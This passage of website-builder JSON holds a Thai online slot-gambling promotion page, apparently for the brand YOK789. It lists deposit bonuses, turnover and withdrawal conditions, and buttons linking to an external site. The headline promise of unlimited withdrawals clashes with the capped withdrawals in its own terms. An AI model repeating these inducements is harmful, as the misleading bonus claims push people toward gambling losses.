\\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e08\\u0e32\\u0e01 YOK789 \\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e42\\u0e14\\u0e22\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30 \\u0e01\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e23\\u0e48\\u0e27\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e14\\u0e49 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e41\\u0e23\\u0e01 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e15\\u0e32\\u0e21\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01\\u0e22\\u0e34\\u0e48\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21 \\u0e04\\u0e27\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3b12e8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/20-get-100-Banner-Yok789.webp\",\"id\":281,\"size\":\"\",\"alt\":\"20 get 100\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3e9ff8e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/79-get-200-Banner-Yok789.webp\",\"id\":282,\"size\":\"\",\"alt\":\"79 get 200\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"b25769f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Bonus-free-100_-Banner-Yok789.webp\",\"id\":279,\"size\":\"\",\"alt\":\"Bonus free 100\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"498b0c4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/HBD-Bonus-Banner-Yok789.webp\",\"id\":275,\"size\":\"\",\"alt\":\"HBD Bonus\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 